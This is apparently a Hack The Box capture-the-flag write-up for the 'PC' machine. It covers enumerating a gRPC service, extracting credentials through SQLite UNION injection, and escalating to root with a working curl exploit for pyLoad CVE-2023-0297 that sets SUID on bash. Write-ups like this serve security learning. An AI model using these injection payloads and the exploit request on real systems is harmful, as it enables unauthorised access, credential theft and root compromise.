PC

Creator: sau123

Machine URL: https://app.hackthebox.com/machines/PC

Difficulty: Easy

Initial enumeration

We start with an nmap scan:

# Nmap 7.93 scan initiated Sat May 20 21:07:11 2023 as: nmap -p- -oA nmap/nmap_initial --min-rate=4000 -vv -sC -sV 10.129.182.219
Nmap scan report for 10.129.182.219
Host is up, received echo-reply ttl 63 (0.035s latency).
Scanned at 2023-05-20 21:07:11 CEST for 46s
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChKXbRHNGTarynUVI8hN9pa0L2IvoasvTgCN80atXySpKMerjyMlVhG9QrJr62jtGg4J39fqxW06LmUCWBa0IxGF0thl2JCw3zyCqq0y8+hHZk0S3Wk9IdNcvd2Idt7SBv7v7x+u/zuDEryDy8aiL1AoqU86YYyiZBl4d2J9HfrlhSBpwxInPjXTXcQHhLBU2a2NA4pDrE9TxVQNh75sq3+G9BdPDcwSx9Iz60oWlxiyLcoLxz7xNyBb3PiGT2lMDehJiWbKNEOb+JYp4jIs90QcDsZTXUh3thK4BDjYT+XMmUOvinEeDFmDpeLOH2M42Zob0LtqtpDhZC+dKQkYSLeVAov2dclhIpiG12IzUCgcf+8h8rgJLDdWjkw+flh3yYnQKiDYvVC+gwXZdFMay7Ht9ciTBVtDnXpWHVVBpv4C7efdGGDShWIVZCIsLboVC+zx1/RfiAI5/O7qJkJVOQgHH/2Y2xqD/PX4T6XOQz1wtBw1893ofX3DhVokvy+nM=
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPqhx1OUw1d98irA5Ii8PbhDG3KVbt59Om5InU2cjGNLHATQoSJZtm9DvtKZ+NRXNuQY/rARHH3BnnkiCSyWWJc=
|   256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBG1KtV14ibJtSel8BP4JJntNT3hYMtFkmOgOVtyzX/R
50051/tcp open  unknown syn-ack ttl 63
...
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Bash

Just two ports are open:

  • TCP 22 for OpenSSH
  • TCP 50051 is an unknown service

There is not much of a choice here on how to proceed. Let’s identify the service running on 50051.

Identifying the service on TCP 50051

First, we attempt to communicate with the server with netcat:

┌──(fluff㉿kali)-[/tmp]
└─$ nc 10.129.180.211 50051
▒?��?�� ?
Bash

The server doesn’t send us any human-readable information.
Let’s hex-dump the data we get.

┌──(fluff㉿kali)-[/tmp]
└─$ nc 10.129.180.211 50051 | xxd
00000000: 0000 1804 0000 0000 0000 0400 3fff ff00  ............?...
00000010: 0500 3fff ff00 0600 0020 00fe 0300 0000  ..?...... ......

00000020: 0100 0004 0800 0000 0000 003f 0000       ...........?..
Bash

A quick Google search for TCP "00 00 18 04" gives us a bunch of gRPC errors.

gRPC client

I will use grpc-client-cli but any client should be fine.

┌──(fluff㉿kali)-[/tmp]
└─$ mkdir /tmp/grpc && curl -L https://github.com/vadimi/grpc-client-cli/releases/download/v1.18.0/grpc-client-cli_linux_x86_64.tar.gz | tar -C /tmp/grpc -xz
Bash
┌──(fluff㉿kali)-[/tmp]
└─$ cd grpc
┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli 10.129.182.219:50051
? Choose a service:  [Use arrows to move, type to filter]
→ grpc.reflection.v1alpha.ServerReflection
  SimpleApp
Bash

We can communicate with the server now.

Exploring SimpleApp

Available methods:

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -s SimpleApp -V 10.129.180.211:50051
? Choose a method:  [Use arrows to move, type to filter][..]
  getInfo
  LoginUser
  RegisterUser
Bash

RegisterUser

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -s SimpleApp -V 10.129.180.211:50051
? Choose a method: RegisterUser
Message json (type ? to see defaults): ?
{"username":"","password":""}
Bash
┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -s SimpleApp -m RegisterUser -V 10.129.180.211:50051
Message json (type ? to see defaults): {"username": "fluffme", "password": "fluffme"}
{
  "message": "Account created for user fluffme!"
}
...
Bash

We can register with the app.

LoginUser

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -s SimpleApp -m LoginUser -V 10.129.180.211:50051
Message json (type ? to see defaults): ?
{"username":"","password":""}
Message json (type ? to see defaults): {"username": "fluffme", "password": "fluffme"}
{
  "message": "Your id is 286."
}
...
Response Trailers:
token: [b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZmx1ZmZtZSIsImV4cCI6MTY4NDg0ODgxN30.6n73qk3Wk_OF-Bb_ao4nucU5A1CMyPbhq686IXDnKFA']
...
Bash

On login we get the id in the response (286 in this case) and what looks like a JWT token in the trailers.

getInfo

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -s SimpleApp -m getInfo -V 10.129.180.211:50051
Message json (type ? to see defaults): ?
{"id":""}
Message json (type ? to see defaults): {"id":"286"}
{
  "message": "Authorization Error.Missing 'token' header"
}
...
Bash

Let’s add the token that we received from LoginUser to the token header.

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZmx1ZmZtZSIsImV4cCI6MTY4NDg0ODgxN30.6n73qk3Wk_OF-Bb_ao4nucU5A1CMyPbhq686IXDnKFA' -s SimpleApp -m getInfo -V 10.129.180.211:50051
Message json (type ? to see defaults): {"id":"286"}
{
  "message": "Will update soon."
}
Bash

Poking around

Now that we have seen and interacted with every functionality that SimpleApp offers us, we can attempt to find some unusual behavior.

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ./grpc-client-cli -H 'token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZmx1ZmZtZSIsImV4cCI6MTY4NDg0ODgxN30.6n73qk3Wk_OF-Bb_ao4nucU5A1CMyPbhq686IXDnKFA' -s SimpleApp -m getInfo -V 10.129.180.211:50051
Message json (type ? to see defaults): {"id":"1"}
{
  "message": "The admin is working hard to fix the issues."
}
Bash

We have an admin ID of 1.

Message json (type ? to see defaults): {"id":"2"}
Error: rpc error: code = Unknown desc = Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable
Bash

ID 2 doesn’t seem to exist.

Message json (type ? to see defaults): {"id":"2-1"}
{
  "message": "The admin is working hard to fix the issues."
}
Bash

ID 2-1 returns the entry for ID 1.
This might be a sign of a SQL Injection…

Message json (type ? to see defaults): {"id":"2 UNION SELECT 'fluff'"}
{
  "message": "fluff"
}
Bash

And it is one!

SQLite Injection in SimpleApp/getInfo

After attempting to identify the DBMS with various payloads we find that it’s SQLite:

Message json (type ? to see defaults): {"id":"2 UNION SELECT sqlite_version();"}
{
  "message": "3.31.1"
}
Bash

Enumerating tables

Message json (type ? to see defaults): {"id":"2 UNION SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'"}
{
  "message": "accounts"
}
Bash
Message json (type ? to see defaults): {"id":"2 UNION SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' LIMIT 1,1"}
{
  "message": "messages"
}
Bash

Getting usernames and passwords

Message json (type ? to see defaults): {"id":"2 UNION SELECT username || ':' || password FROM accounts"}
{
  "message": "admin:admin"
}
Bash
Message json (type ? to see defaults): {"id":"2 UNION SELECT username || ':' || password FROM accounts LIMIT 1,1"}
{
  "message": "sau:H<REDACTED>1"
}
Bash

We get the credentials for user sau. The password is reused and we can SSH with it.

Foothold as sau

┌──(fluff㉿kali)-[/tmp/grpc]
└─$ ssh sau@10.129.180.211
...
sau@10.129.180.211's password:
...
sau@pc:~$
Bash

Grab the flag in user.txt located in sau’s home directory.

Enumeration

Let’s check the listening TCP ports:

sau@pc:~$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8000          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:9666            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::50051                :::*                    LISTEN      -
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -
Bash

Interesting ports – 8000 and 9666

sau@pc:~$ curl 127.0.0.1:8000
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F">/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F</a>. If not, click the link.
sau@pc:~$ curl -s 127.0.0.1:8000/login | grep '<title'
<title>Login - pyLoad </title>
Bash
sau@pc:~$ curl -s 127.0.0.1:9666/login | grep '<title'
<title>Login - pyLoad </title>
Bash

pyLoad is running on both ports.

Let’s get the version of pyLoad and search for known vulnerabilities.

sau@pc:~$ ps fauxwww | grep pyload
root        1010  0.1  1.4 1216804 59916 ?       Ssl  10:28   0:03 /usr/bin/python3 /usr/local/bin/pyload
sau         1544  0.0  0.0   8160   656 pts/0    S+   11:08   0:00              \_ grep --color=auto pyload
sau@pc:~$ /usr/local/bin/pyload --version
pyLoad 0.5.0
Bash

After a quick search, we find a Code Injection CVE-2023-0297 advisory on pyLoad’s GitHub.

Privilege Escalation to root – CVE-2023-0297

The advisory also contains a link to Proof of Concept: https://huntr.dev/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65/

Payload

We will just add a SUID bit to bash binary.

pyimport os;os.system("chmod +s /usr/bin/bash")
Python3

URL Ecnoded:

%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%63%68%6d%6f%64%20%2b%73%20%2f%75%73%72%2f%62%69%6e%2f%62%61%73%68%22%29
Bash

Exploitation

sau@pc:~$ curl -s -X POST --data-binary 'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%63%68%6d%6f%64%20%2b%73%20%2f%75%73%72%2f%62%69%6e%2f%62%61%73%68%22%29;f=function%20f2(){};&passwords=aaaa' http://127.0.0.1:8000/flash/addcrypted2

Could not decrypt key
Bash
sau@pc:~$ ls -la /usr/bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /usr/bin/bash
Bash

Success!
Get root by executing bash -p and get the root.txt.

sau@pc:~$ bash -p
bash-5.0# cat /root/root.txt
Bash